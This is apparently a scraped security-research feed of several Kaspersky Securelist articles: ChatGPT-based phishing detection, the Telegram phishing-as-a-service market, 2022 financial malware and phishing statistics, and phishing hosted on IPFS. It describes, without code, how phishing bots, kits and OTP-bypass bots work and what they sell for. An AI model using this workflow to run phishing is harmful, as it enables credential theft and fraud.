First of all, we noticed that the model used mostly short, terse sentences with one point per sentence in its explanations. We split the statements into sentences using the NLTK Punkt tokenizer. The resulting sentences were then vectorized using MPNet from the Sentence-Bert package, and then visualized using UMAP. To color the resulting plot, we used DBSCAN clustering. A few iterations of hyperparameter tweaking yield the following result:

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

These dense clusters reveal the most popular phrases that the model provides as explanations. Some of these clusters are:

  • Mentions of particular target companies.
  • Recommendations not to click the link.
  • Certain statements about the website being phish or not.
  • Statements of uncertainty.
  • References to HTTPS (or lack thereof) or SSL (usually hallucinations)
  • Sentences like “This is a common tactic…”

However, some of them reveal “common tactics”:

  • Use of IPFS: “The URL looks suspicious and appears to be hosted on IPFS which can be used to host malicious content.”
  • Suspicious elements in path, including homographic attacks: “This link is an example of a homograph attack also known as ‘IDN homograph attack’.”
  • Elements in path or domain that are related to security and urgency: “Lastly, the URL has a sense of urgency to it, indicating that the user needs to click immediately.”
  • Use of dynamic DNS: “The domain name ‘duckdns.org’ is a free dynamic DNS provider that can be used by anyone to create custom subdomains, which makes it easy for attackers to use for phishing emails or websites impersonating legitimate companies”.
  • An email in the parameters: “Additionally, the email address used as a query parameter may indicate a potential phishing attempt.”
  • Mention of an organization in the path or subdomain while the domain is not related to the organization: “The link appears suspicious as it contains a subdomain that is not related to Amazon.”
  • Elements in the domain that look autogenerated: “Also, the path ‘bafyxxxxxxxxxxxxxxxxxx43ky’ suggests that this is an autogenerated link.”

These points make a lot of sense. This means that the training data for ChatGPT contained enough cybersecurity material for the LLM to learn the telltale signs of phishing attempts and use this knowledge to analyze specific cases, which is very impressive.

Conclusion

As we have seen, for a zero-shot system the results are amazing – it is hard to argue with, even for a die-hard sceptic. Anecdotal examples, especially the cherry-picked ones, are also very impressive. This is why, when we talk about real-world performance, a screenshot from Twitter is not a solid basis for decision-making. This is especially true in cybersecurity, where applying automated scenarios to our tasks means going far beyond “good” or even “impressive” performance.

As with many other use cases, the core detection task is only part of the problem. Creating signatures or blocklist records, validating and testing them, delivering them, ensuring quality of service is less glamorous, but just as important, and here we need a lot of hard work done by humans to get things rolling.

Moreover, the use of LLM means applying a whole new set of skills. We could have improved the results, both in detection, target organization extraction and reasoning, by trying various things:

  • Using a stronger model, such as GPT-4
  • Using special prompt-designing patterns, such as Chain-of-Thought-prompting or Reflect-Critique-Improve
  • Feeding parts of the HTML along with the URL
  • Adjusting the system prompt and sampling parameters, such as temperature, etc.

However, this means abandoning the hope of a zero-shot AI that “just works”. Also, using LLMs means dealing with their current idiosyncrasies, such as the demonstrated tendency to hallucinate (manifested by coming up with imaginary explanations and referring to page texts it has never seen), randomness of output, as well as possible prompt injection attacks.

On the other hand, if we look at the organization extraction and reasoning, we have to admit that it performs on par with what we would expect from an intern-level phishing analyst: it is good, but never leave it without supervision! Therefore, it is possible to use this type of technology to assist flesh-and-blood analysts by highlighting suspicious parts of the URL and suggesting possible attack targets. It could also be used in weak supervision pipelines to improve classic ML pipelines.

All in all, while impressive, ChatGPT and LLMs are not yet ready to radically change the cybersecurity game, at least as far as phishing detection is concerned. At Kaspersky, we continue to investigate cutting-edge technologies and study their potential impact on both cyberattackers and defenders. Let’s see what happens next.

]]>
https://securelist.com/chatgpt-anti-phishing/109590/feed/ 1 full large medium thumbnail
The Telegram phishing market https://securelist.com/telegram-phishing-services/109383/ https://securelist.com/telegram-phishing-services/109383/#comments Wed, 05 Apr 2023 10:00:17 +0000 https://kasperskycontenthub.com/securelist/?p=109383

Telegram has been gaining popularity with users around the world year by year. Common users are not the only ones who have recognized the messaging app’s handy features — cybercrooks have already made it a branch of the dark web, their Telegram activity soaring since late 2021.

The service is especially popular with phishers. They have become adept at using Telegram both for automating their activities and for providing various services — from selling phishing kits to helping with setting up custom phishing campaigns — to all willing to pay.

To promote their “goods”, phishers create Telegram channels through which they educate their audience about phishing and entertain subscribers with polls like, “What type of personal data do you prefer?”. Links to the channels are spread via YouTube, GitHub and phishing kits they make.

This story covers the variety of phishing services available on Telegram, their details and pricing, and ways of detecting phishing content that originates in Telegram.

The Telegram black market: what’s on offer

After reviewing phishers’ Telegram channels that we detected, we broke down the services they promoted into paid and free.

Free content for aspiring phishers

Automated phishing with Telegram bots

Functional and configurable, Telegram bots help private users and businesses with automating many routine workflows, such as searching for and retrieving information on schedule, answering frequently asked questions from customers, setting up reminders and many others. Malicious actors use Telegram bots to automate illegal activities, such as generating phishing pages or collecting user data.

The process of creating a fake website with a Telegram bot typically includes the following steps:

  1. The wannabe phisher joins the bot creator’s channel.

  2. As a rule, the bot offers to select a language once started. In the example below, the bot speaks English and Arabic.

    Starting a Telegram phishing bot

    Starting a Telegram phishing bot

  3. The bot offers the user to create a new bot of their own and share the token with the main bot. The purpose of this second bot is to capture data of users who follow the phishing links and attempt to log in to the fake website. It is the budding scammer’s job to set up that new bot on Telegram, but that process is also automated and no rocket science.

    Phishing bot asking the user to set up a new bot and share the token

    Phishing bot asking the user to set up a new bot and share the token

  4. Once the user feeds the token to the first bot, it generates a series of links to fake websites hosted in the same domain. The sites may mimic various services: PUBG, Facebook, PayPal and so on.

    List of off-the-shelf pages in the same domain

    List of off-the-shelf pages in the same domain

Distributing the links is something the wannabe phisher has to do without any help from the bot. If a visitor enters their credentials on the fake page, a notification will be sent to the chat with the bot that our beginning scammer created while generating links to the fake page. The notification will typically contain the phishing link, the victim’s credentials, the name of the country that they logged in from, the country code and the IP address of the device that was used.

Message with the stolen data received by the phisher

Message with the stolen data received by the phisher

Bots that generate phishing pages may differ slightly. For instance, before generating phishing links, one particular bot offers to select a service to mimic and enter a URL the victim will be redirected to after trying to log in. The latter is typically the Google home page or the main page of the service that the phishing page imitates. Once a URL is entered, the bot will generate several scam links targeting users of the service. In this case, victims’ credentials will be sent directly to the phishing bot.

List of services suggested by the bot

List of services suggested by the bot

What are these fake pages that are so easy to generate? A victim who clicks a link in a message that promises, say, 1,000 likes in TikTok will be presented with a login form that looks like the real thing. The page typically contains nothing besides that form. We filled in the login and password fields in the screenshot below.

Fake TikTok login page generated by the phishing bot

Fake TikTok login page generated by the phishing bot

From an engineering standpoint, this is a rather primitive product of a basic phishing kit. When a scammer requests a phishing page from a Telegram bot, it forwards the request along with all required data to a utility that assembles pages from predefined packages and returns hyperlinks. To forward the stolen data to the bot, phishing kits include a script into which the token of the bot that receives user credentials, Telegram bot chat identifier and a URL to redirect the user after entering their credentials will be inserted. Some scripts may lack the URL field.

Script to configure stolen data forwarding to the Telegram bot

Script to configure stolen data forwarding to the Telegram bot

By the way, there is no reason why the developer of a phishing kit cannot configure it to grab a copy of the data obtained by the unsuspecting newbie phisher.

Free phishing kits and users’ personal data

Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands.

Archive with phishing kits posted in a Telegram scam channel

Archive with phishing kits posted in a Telegram scam channel

Contents of a free phishing kit archive

Contents of a free phishing kit archive

Phishers also share stolen personal data with their subscribers, tagging it with information on whether it was verified or not. “Yellow light data” in the screenshot below stands for “unknown data quality”. This is probably an allusion to the yellow traffic light.

Files containing free credentials of US and Russian users

Files containing free credentials of US and Russian users

Why would scammers so generously share valuable data with others instead of using it for their own benefit? One reason is that any free content or manuals so willingly distributed by scammers to their Telegram audience serve as bait of sorts for less experienced phishers to bite. Newbies get a taste of what phishing tools can do, pull off their first scam and wish for more, which is when they will be offered paid content.

Another reason is recruiting an unpaid workforce. As mentioned above, the creators of phishing bots and kits can get access to data collected with tools they made. To attract larger audiences, scam operators advertise their services, promising to teach others how to phish for serious cash.

Ad for a Telegram channel offering phishing content

Ad for a Telegram channel offering phishing content

Besides free phishing kits and bot-powered scams, Telegram fraudsters offer paid phishing pages and data, as well as phishing-as-a-service (PhaaS) subscriptions. The service may include access to phishing tools, as well as guides for beginners and technical support.

Malicious actors offer “premium” phishing and scam pages for sale. Unlike the primitive copies of popular websites, these offers include pages built from scratch with a range of advanced capabilities or tools for generating such pages. For instance, a “premium” page may include elements of social engineering, such as an appealing design, promises of large earnings, an anti-detection system and so on.

Scam pages offered for sale in Telegram

Scam pages offered for sale in Telegram

In the screenshot below, the seller promises that each of their “projects” has an anti-bot system, URL encryption, geoblocking and other features that attackers will find useful. The seller goes on to offer custom phishing pages that can include any components requested by the customer.

The seller's description of advanced phishing page functionalities

The seller’s description of advanced phishing page functionalities

After looking closer at these offers, we found that they do contain scripts to block web crawlers and anti-phishing technology. Therefore, these projects are essentially complex or advanced phishing kits.

Contents of a phishing kit archive with an anti-bot system

Contents of a phishing kit archive with an anti-bot system

“Premium page” vendors update their anti-bot systems regularly, so the phishing contents could remain undetected and thus, usable.

Phishing page vendor announcing the anti-bot system has been updated

Phishing page vendor announcing the anti-bot system has been updated

Prices for this kind of fake pages differ, with some vendors asking $10 per copy, and others charging $50 for an archive with several pages in it. A package that includes less frequently offered features, for example, 3-D Secure support, and assistance with configuring a fake website, may cost up to $300.

Scam page with 3-D Secure support offered for $280

Scam page with 3-D Secure support offered for $280

User personal data for sale

Online banking credentials obtained through phishing techniques are often offered for sale too. Unlike the free data mentioned above, these have been checked, and even the account balances have been extracted. The higher the balance, the more money scammers will typically charge for the credentials.

For example, the same Telegram channel offered the credentials for a bank account with $1,400 in it for $110, whereas access to an account with a balance of $49,000 was put up for $700.

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $1,400

Offer of credentials for an account with a balance of $49,000

Offer of credentials for an account with a balance of $49,000

Phishing-as-a-Service

In addition to one-time sales of phishing kits and user data, scammers use Telegram channels to sell a range of subscriptions with customer support included. Support includes providing updates on a regular basis for the phishing tools, anti-detection systems and links generated by the phishing kits.

An OTP (one-time password) bot is another service available by subscription. Legitimate services use one-time passwords as a second authentication factor. Many organizations enforce a two-factor authentication (2FA) requirement these days, which makes it impossible to hijack an account with just the login and password. Phishers use OTP bots to try and hack 2FA.

The bots call users, posing as the organization maintaining the account that the phishers are trying to hack, and convince them to enter a 2FA code on their phones. The calls are fully automated. The bot then enters the code in a required field, giving the phisher access to the account.

List of OTP bot features and benefits

List of OTP bot features and benefits

According to a bot vendor we talked to, a weekly subscription with unlimited calls will set a beginning scammer back $130, while a monthly subscription including bot customization costs as much as $500.

Our chat with the vendor about OTP bot pricing

Our chat with the vendor about OTP bot pricing

Another OTP bot is offered on a pay-per-minute, prepaid basis. Rates start at $0.15 per minute depending on the destination. The bot can record calls and store settings, such as the victim’s phone number, name and so on.

OTP bot interface: the victim's name and phone number, service name and language are required for setting up a call

OTP bot interface: the victim’s name and phone number, service name and language are required for setting up a call

A customer who shares this information with the bot creators, along with a screenshot showing the victim’s account number, balance and other details, may be rewarded with a small amount added to their OTP bot balance: $5 for two units of information and $10 for three or more.

Some PhaaS vendors take their customers’ trust seriously. In the screenshot below, you can see assurances that all data obtained with paid tools is reliably encrypted, so that neither the vendor nor any third parties can read it. All these vendors want is their customers to remain loyal.

PhaaS vendor explaining to customers that all their data is reliably encrypted

PhaaS vendor explaining to customers that all their data is reliably encrypted

Detection and statistics

Despite phishers who offer their services in Telegram use many ways to avoid blocking, our systems detect their fake sites with maximum precision, adding them to our databases.

Malicious sites generated by phishing bots are either hosted in the same domain, or share parts of HTML code, or both. This makes it easy for our cyberthreat detection technology to discover them.

In the above example of a bot generating phishing pages the same domain was used to host fake websites that mimicked those of various legitimate organizations. We have detected a total of 1483 attempts to access pages located in that domain since it emerged.

Kaspersky anti-phishing detection statistics for a domain linked to a phishing bot, December 2022 through March 2023 (download)

Since many off-the-shelf phishing solutions offered on Telegram are basic or complex phishing kits, here are some relevant detection statistics on those. In the last six months, our technology has detected 2.5 million malicious URLs generated with phishing kits.

Number of detected malicious URLs generated with phishing kits, October 2022 through March 2023 (download)

We prevented 7.1 million attempts by users to access these malicious sites within the same period.

Kaspersky anti-phishing detection statistics for pages generated with phishing kits, October 2022 through March 2023 (download)

Takeaways

Wannabe phishers used to need to find a way onto the dark web, study the forums there and do other things to get started. The threshold to joining the phisher community lowered once malicious actors migrated to Telegram and now share insights and knowledge, often for free, right there in the popular messaging service.

Even the laziest and most cash-strapped can use Telegram bots offered by channel owners to generate phishing pages and obtain data stolen from their victims. Some attackers upload archives with data for anyone to make use of. An aspiring phisher who wishes to generate a greater variety of content can download phishing kits that target a wide range of organizations.

Scammers use an array of free offers to promote paid services. They are also likely manipulating newcomers into using their free phishing kits and bots, which can potentially share stolen data with their creators.

The more solvent audience are offered to pay for phishing pages with geoblocking functionality and regularly updated anti-bot systems, which are harder to detect than those generated with basic phishing kits and bots. Prices range from $10 to $300 and depend on the feature set. Phishers also sell stolen online baking credentials and offer OTP bots subscriptions that can be used to bypass 2FA.

A detailed review of available offers on Telegram phishing channels suggests that the bulk of these consists of phishing kits, which our technology successfully blocks: over the last six months, we have detected 2.5 million pages generated with phishing kits.

]]>
https://securelist.com/telegram-phishing-services/109383/feed/ 1 full large medium thumbnail
Financial cyberthreats in 2022 https://securelist.com/financial-cyberthreats-in-2022/109219/ https://securelist.com/financial-cyberthreats-in-2022/109219/#respond Wed, 29 Mar 2023 10:00:02 +0000 https://kasperskycontenthub.com/securelist/?p=109219

Financial gain remains the key driver of cybercriminal activity. In the past year, we’ve seen multiple developments in this area – from new attack schemes targeting contactless payments to multiple ransomware groups continuing to emerge and haunt businesses. However, traditional financial threats – such as banking malware and financial phishing, continue to take up a significant share of such financially-motivated cyberattacks.

In 2022, we saw a major upgrade of the notorious Emotet botnet as well as the launch of massive campaigns by Emotet operators throughout the year. For instance, malicious spam campaigns targeting organizations grew 10-fold in April 2022, spreading Qbot and Emotet malware. We also witnessed the emergence of new banking Trojans that hunt for banking credentials, and greater activity on the part of some well-known ones, such as Dtrack, Zbot and Qbot.

The good news is that regardless of these continuous advancements, we’ve witnessed a steady decrease in the number of attacks by banking Trojans. Security solutions integrated into operating systems, two-factor authentication and other verification measures have helped reduce the number of vulnerable users. Additionally, in many markets mobile banking has been pushing out online banking, with more and more convenient and secure banking apps emerging.

Meanwhile, cryptocurrency became a prominent target for those seeking monetary gain. The amount of cryptocurrency-related phishing grew significantly in 2022, and with an endless array of new coins, NFT and other DeFi projects, scammers are continuously duping users. Funds lost via cryptocurrency are hard to track and impossible to return with the help of a regulatory body, as is done with banks and fiat currency, so this trend is likely to continue gaining traction.

Some advanced persistent threat (APT) actors also started tapping into the cryptocurrency market. We previously reported on the Lazarus group, which developed VHD ransomware for the purpose of monetary gain. Now we see that APT actors have also switched to crypto. BlueNoroff developed an elaborate phishing campaign that targeted startups and distributed malware for stealing all crypto in the account tied to the device. They impersonated numerous venture capital groups and investors with considerable success. The NaiveCopy campaign, another example of an advanced threat, targeted stock and cryptocurrency investors in South Korea. And there is more room for further development – hardware wallets and smart contracts could provide a new juicy target for attackers.

This report shines a spotlight on the financial cyberthreat landscape in 2022. It presents a continuation of our previous annual financial threat reports (2018, 2019, 2020, 2021), which provide an overview of the latest trends across the threat landscape. We look at phishing threats commonly encountered by users and companies, as well as the dynamics of various Windows and Android-based financial malware.

Methodology

For this report, we conducted a comprehensive analysis of financial cyber threats in 2022. We focused on malicious software that targets financial services institutions such as online banking, payment systems, e-money services, online stores, and cryptocurrency services. This category of financial malware also includes those seeking unauthorized access to financial organisations’ IT infrastructures.

In addition to financial malware, we also examined phishing activities. This entailed studying the design and distribution of financially themed web pages and emails that impersonate well-known legitimate sites and organizations with the intention of deceiving potential victims into disclosing their private information.

To gain insights into the financial threat landscape, we analyzed data on malicious activities on the devices of Kaspersky security product users. Individuals who use these products voluntarily made their data available to us through Kaspersky Security Network. All data collected from Kaspersky Security Network was anonymized.

We compared the data from 2022 to that of 2021 to identify year-on-year trends in malware development. However, we also included occasional references to earlier years to provide further insights into the evolutionary trends in financial malware.

Key findings

Phishing

  • Financial phishing accounted for 36.3% of all phishing attacks in 2022.
  • E-shop brands were the most popular lure, accounting for 15.56% of attempts to visit phishing sites.
  • PayPal was the almost exclusive focus of phishers in the electronic payment systems category, with 84% of phishing pages targeting the platform.
  • Cryptocurrency phishing saw 40% year-on-year growth in 2022, with 5,040,520 detections compared to 3,596,437 in 2021

PC malware

  • The number of users affected by financial malware continued to decline in 2022, dropping by 14% from 2021.
  • Ramnit and Zbot were the most prevalent malware families, targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.8% of attacks.

Mobile malware

  • The number of Android users attacked with banking malware decreased by around 55% in 2022 compared to the previous year.
  • Bian surpassed Agent as the most active mobile malware family in 2022, with 22% of attacks compared to Agent’s 20%.
  • The geographical distribution of affected users by Android banking malware in 2022 shows that Spain had the highest percentage of targeted users with 1.96%, followed by Saudi Arabia with 1.11% and Australia with 1.09%.

Financial phishing

Phishing continues to be one of the most widespread forms of cybercrime thanks to the low entry threshold and its effectiveness. As we covered previously, cybercriminals can launch phishing campaigns with minimal effort by purchasing ready-made phishing kits.

Phishing is typically built around a classic scheme: first create a website, then craft emails or notifications that mimic real organizations and prompt users to follow a link to the site, share their personal or payment information, or download a program disguised as malware. Phishers mimic every type of organization, including banks, government services, retail and entertainment, as long as the service has a strong user base.

Financial services in particular are of high interest to phishers due to the direct connection to money and payment data. In 2022, 36.3% of all phishing attacks detected by Kaspersky anti-phishing technologies were related to financial phishing.

Distribution of financial phishing cases by type, 2022 (download)

In this report, financial phishing includes banking-specific, but also e-shop and payment systems.

Payment-system phishing refers to phishing pages that mimic well-known payment brands, such as PayPal, MasterCard, Visa, and American Express. E-shops mean online stores and auction sites such as Amazon, Aliexpress, the App Store, and eBay.

In 2022, e-shop brands were the most popular type of lure used by phishers. 15.56% of attempts to visit phishing sites blocked by Kaspersky in 2022 were related to e-shops. If we look at the distribution within financial phishing, e-shops account for 42% of financial phishing cases. E-shops were followed by payment systems (10.39%) and banks (10.39%). Online shopping continues to grow worldwide and, accordingly, the number of brands that are being mimicked by phishers grows with novel schemes appearing on a regular basis.

E-shop brands most frequently exploited in financial phishing schemes, 2022 (download)

In 2022, Apple remains the most exploited brand by scammers, with almost 60% of attacks. The allure of winning the latest model of a new device has proved irresistible to many users, especially during the current global crisis with increasing prices. Not only did we see a spike in these types of scams during major Apple events, but also scammers frequently use Apple to lure victims by offering, for instance, newly released iPhones as prizes for predicting match outcomes during major events like the FIFA World Cup. Meanwhile, Amazon remained in second place with 14.81% of attacks.

In the realm of electronic payment systems, PayPal has traditionally been a popular target for exploitation by scammers. However, recent data indicates that this year it is not only the primary but the near exclusive focus of phishers, with a staggering 84.23% of phishing pages for electronic payment systems targeting PayPal. As a result, the shares of other payment systems have plummeted, with MasterCard International down to 3.75%, Visa Inc. down to 3.10%, and American Express down to 2.02% in 2022.

Payment system brands most frequently exploited in financial phishing schemes, 2022  (download)

Example of a phishing page mimicking the PayPal login page

Example of a phishing page mimicking the PayPal login page

Cryptophishing

In 2022, cryptocurrency phishing rose sufficiently to be included as a separate category. While the total number of attempts to visit such sites makes up just a fraction (0.87%) of all phishing, this category of phishing demonstrated 40% year-on-year growth with 5,040,520 detections in 2022 compared to 3,596,437 in 2021. This boom in cryptophishing may be partially explained by the cryptomarket havoc we saw last year. That said, it is so far unclear whether the trend will continue, and this will significantly depend on the trust users put in cryptocurrency.

Example of a phishing page offering crypto

Example of a phishing page offering crypto

Cryptoscams exploit the topic of cryptocurrency to deceive people and steal their money, often through promises of high returns on investments. Common types include Ponzi schemes, ICO scams, phishing scams, and fake wallet scams.

Example of a phishing page asking for crypto details

Example of a phishing page asking for crypto details

Banking malware

This section analyzes banking malware used for stealing login credentials for online banking or payment systems, as well as capturing one-time passwords for two-factor authentication.

Our analysis of financial cyberthreats in 2022 revealed that the number of users affected by financial malware continued to decline. The figures showed a decrease from 405,985 in 2021 to 350,808 in 2022, marking a 14% drop. This decline followed the trend observed over the previous years, with a 35% drop in 2021, a 20% decline in 2020, and a near 13% decrease in 2019. Financial PC malware is on the wane due to the challenges and costs associated with maintaining and developing a botnet capable of successfully attacking users. To execute a successful attack, the Trojan must wait until the user manually logs in to their bank’s website, which has become more infrequent with the growth in popularity of mobile banking apps. Furthermore, the latest versions of operating systems come with built-in security systems, and prolonged presence in the system raises the probability of malware detection. This might also indicate a pivot toward advanced targeted attacks as cybercriminals start to prioritize large business targets.

Additionally, cybercriminals are adapting their tactics to exploit the shift toward mobile banking. As users increasingly switch to phone banking, attackers are developing new techniques to compromise mobile devices and steal sensitive information.

Dynamic change in the number of unique users attacked by banking malware in 2021 – 2022  (download)

Main actors among banking malware

Our 2022 analysis of financial cyberthreats revealed the presence of several families of banking malware with varying lifecycles. Ramnit emerged as the most prevalent malware family with a share of 34.4%, followed by Zbot with 16.2%. Interestingly, the analysis highlights that over 50% of affected users were targeted only by these two families. Ramnit activity increased substantially compared to the previous year, when its slice was only 3.4%. This malware worm spreads through spam emails with links to infected websites, and steals financial information. Emotet, previously named by Europol the world’s most dangerous malware, made a return to the Top 3 most active malware families after law enforcement shut it down in January 2021.

The lifecycle of Emotet vividly demonstrates how malware families continue to evolve and expand their capabilities to infiltrate and compromise financial systems.

Top 10 PC banking malware families

Name Verdicts %*
Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 34.4
Zbot/Zeus Trojan-Banker.Win32.Zbot 16.2
Emotet Trojan-Banker.Win32.Emotet 6.4
CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.2
IcedID Trojan-Banker.Win32.IcedID 4.1
Trickster/Trickbot Trojan-Banker.Win32.Trickster 4.0
SpyEye Trojan-Spy.Win32.SpyEye 3.4
RTM Trojan-Banker.Win32.RTM 2.5
Gozi Trojan-Banker.Win32.Gozi 2.4
BitStealer Trojan-Banker.MSIL.BitStealer 1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

In this year’s report, we calculated the percentage of Kaspersky users in each country that encountered a financial cyberthreat relative to all users that were attacked by financial malware. This approach helps us identify the countries with the highest risk of computer infection due to financial malware.

The 2022 report shows the distribution of financial malware attacks across different countries. The Top 20 countries in the list below account for more than half of all infection attempts.

Top 20 countries and territories by share of attacked users

Country or territory* %**
Turkmenistan 6.6
Afghanistan 6.5
Tajikistan 4.9
China 3.3
Uzbekistan 3.3
Yemen 3.3
Sudan 2.9
Mauritania 2.8
Egypt 2.5
Azerbaijan 2.5
Venezuela 2.5
Paraguay 2.5
Switzerland 2.4
Syria 2.4
Libya 2.3
Algeria 2.2
Iraq 2.0
Indonesia 1.9
Bangladesh 1.8
Pakistan 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

The data shows that Turkmenistan has the highest share of attacked users with 6.6%, followed by Afghanistan and Tajikistan with 6.5% and 4.9% respectively.

Types of users attacked

The 2022 numbers show that the distribution of financial cyberthreats remained relatively stable, with consumers (61.8%) still being the primary target and corporate users (38.2%) accounting for a smaller percentage of attacks. The 2022 increase is relatively small, at less than 1%, and does not represent a significant shift in the overall distribution of attacks.

Malware attack distribution by type (corporate vs consumer), 2021 – 2022 (download)

This can be attributed to the fact that the world has become accustomed to the new style of post-pandemic work, with many companies continuing to operate in remote or hybrid work modes. The trend of working from home or remotely is no longer new, and many companies have adapted to it. As a result, they have also learned how to deal with potential threats and have implemented measures to ensure the security of their employees’ devices and data. Now employees are likely using similar devices and security measures for personal and work purposes, making it harder for cybercriminals to differentiate between consumer and corporate targets.

Mobile banking malware

We have been observing a steady and steep downward trend in the number of Android users affected by banking malware for at least four years now. In 2022, the number of Android users attacked with banking malware was 57,219, which is more than 2.5 times less than the figures reported in the previous year, representing a drop of around 55%.

This trend marked a continuation from previous years, with the number of Android users attacked dropping by 55% in 2020 and by almost 50% in 2021, resulting in a total of 147,316 users affected in 2021.

Number of Android users attacked by banking malware by month, 2020 – 2022 (download)

Despite the steady decline in the number of Android users affected by banking malware, it is important for users not to become complacent, as cybercriminals continue to evolve their malware and find new ways to carry out attacks. In 2022, we identified over 200,000 new banking Trojan installers, which is twice the number reported in the previous year.

Comparing the most active mobile malware families of 2021 to those of 2022, we see some significant changes. In 2021, Agent was the most prevalent mobile malware, representing 26.9% of attacks. However, in 2022, Bian surpassed Agent as the most active mobile malware family, with 24.25% attacks compared to Agent’s 21.57%.

As for the other malware families on the list, Anubis (11.24%) and Faketoken (10.53%) maintained their positions in the Top 5, respectively. Asacub also remained in the Top 5 list, with almost 10% of attacks, but dropped to fifth place from its third-place ranking in 2021.

Top10 Android banking malware families

Name Verdicts %*
Bian Trojan-Banker.AndroidOS.Bian 24.25
Agent Trojan-Banker.AndroidOS.Agent 21.57
Anubis Trojan-Banker.AndroidOS.Anubis 11.24
Faketoken Trojan-Banker.AndroidOS.Faketoken 10.53
Asacub Trojan-Banker.AndroidOS.Asacub 9.91
Svpeng Trojan-Banker.AndroidOS.Svpeng 6.08
Cebruser Trojan-Banker.AndroidOS.Cebruser 5.23
Gustuff Trojan-Banker.AndroidOS.Gustuff 3.13
Bray Trojan-Banker.AndroidOS.Bray 2.27
Sova Trojan-Banker.AndroidOS.Sova 2.14

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Svpeng, which was the third most prevalent malware family in 2021, with 21.4% of attacks, dropped to sixth place in 2022, with 6.08% attacks. Meanwhile, Cebruser, Gustuff, Bray, and Sova entered the list.

Geography of attacked users

The geographical distribution of affected users by Android banking malware in 2021 shows some differences between the two lists of Top 10 countries and regions. In the first list, Japan had the highest percentage of targeted users with 2.18%, followed by Spain with 1.55%, while in the second list, Spain had the highest percentage with 1.96%, followed by Saudi Arabia with 1.11%.

Australia appeared in both lists, with a 0.48% share in the first list and a 1.09% share in the second. Turkey also appeared in both lists, with a 0.71% share in the first list and a 0.99% share in the second. Italy had a 0.29% share in the first list and a 0.17% share in the second list, while Japan had a 0.30% share in the second list.

Top 10 countries and territories, 2021

Country or territory* %**
Japan 2.18
Spain 1.55
Turkey 0.71
France 0.57
Australia 0.48
Germany 0.46
Norway 0.31
Italy 0.29
Croatia 0.28
Austria 0.28

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Top 10 countries and territories, 2022

Country or territory* %**
Spain 1.96
Saudi Arabia 1.11
Australia 1.09
Turkey 0.99
Switzerland 0.48
Japan 0.30
Colombia 0.19
Italy 0.17
India 0.16
South Korea 0.16

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Overall, the two lists show that banking malware continues to be a global threat, affecting users in different countries and regions.

Conclusion

Year 2022 demonstrated that banking malware attacks continue to decline, both for PC and mobile malware. Still, the number of such attacks remains significant and users, as always, need to stay vigilant. At the same time, cybercriminals are switching their focus to cryptocurrency, as these attacks are harder to track. With new payment systems emerging, we are sure to see new attacks in the future and, potentially, yet more targeting of cryptocurrency.

Additionally, financial phishing schemes remain a top category in all phishing, with fraudsters continuing to hunt for banking and other sensitive data, exploiting trusted brands. This activity isn’t likely to die down, and we will continue to witness new schemes emerge on a regular basis.

For protection against financial threats, Kaspersky recommends to:

  • Install only applications obtained from reliable sources
  • Refrain from approving rights or permissions requested by applications without first ensuring they match the application’s feature set
  • Never open links or documents included in unexpected or suspicious-looking messages
  • Use a reliable security solution, such as Kaspersky Premium, that protects you and your digital infrastructure from a wide range of financial cyberthreats

To protect your business from financial malware, Kaspersky security experts recommend:

  • Providing cybersecurity awareness training, especially for employees responsible for accounting, that includes instructions on how to detect phishing pages
  • Improving the digital literacy of staff
  • Enabling a Default Deny policy for critical user profiles, particularly those in financial departments, which ensures that only legitimate web resources can be accessed
  • Installing the latest updates and patches for all software used
]]>
https://securelist.com/financial-cyberthreats-in-2022/109219/feed/ 0 full large medium thumbnail
How scammers employ IPFS for email phishing https://securelist.com/ipfs-phishing/109158/ https://securelist.com/ipfs-phishing/109158/#respond Mon, 27 Mar 2023 08:00:48 +0000 https://kasperskycontenthub.com/securelist/?p=109158

The idea of creating Web 3.0 has been around since the end of 2000s. The new version of the world wide web should repair the weak points of Web 2.0., some of which are: featureless content, prevalence of proprietary solutions, and lack of safety in a centralized user data storage environment, where a massive leak is likely should just one server be compromised. Web 3.0 is described as a decentralized and open internet — some of its features already implemented in today’s digital world.

Unfortunately, the “new internet” will still remain a playground for criminals who will employ cutting-edge technologies for their old sport of data theft, financial machinations and the like. In this article, I will dwell on how they use one of the WEB 3.0 technologies — the distributed file system IPFS — for email phishing attacks.

What is IPFS?

IPFS (InterPlanetary File System) is a peer-to-peer distributed file system enabling users around the world to exchange files. Unlike centralized systems, IPFS uses addressing performed according to unique content identifiers (CID), and not file paths. CID is generated based on the file’s hash value and then recorded to a distributed hash table, which also contains information on the file owner. The file itself resides on the computer of the user who had “uploaded” it to IPFS, and is downloaded directly from that computer. The structure of IPFS is somewhat similar to the BitTorrent protocol which, too, is a distributed network where file exchange takes place directly between the users’ devices.

By default, uploading a file to IPFS or downloading it requires special software (IPFS client). For users to view the files residing in IPFS freely without installing any software, the so-called gateways are provided. A gateway is in fact a server with access to IPFS. To open a file via a gateway, a URL is required normally containing a gateway address, reference to IPFS, and the file’s CID. URL formats can be quite different, for example:

  • https://gateway_address/ipfs/CID
  • https://CID.ipfs.gateway_address

Phishing and IPFS

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies, so that victims could open the file, whether or not running an IPFS client on their devices. The scammers would include file access links via a gateway into phishing letters dispatched to would-be victims.

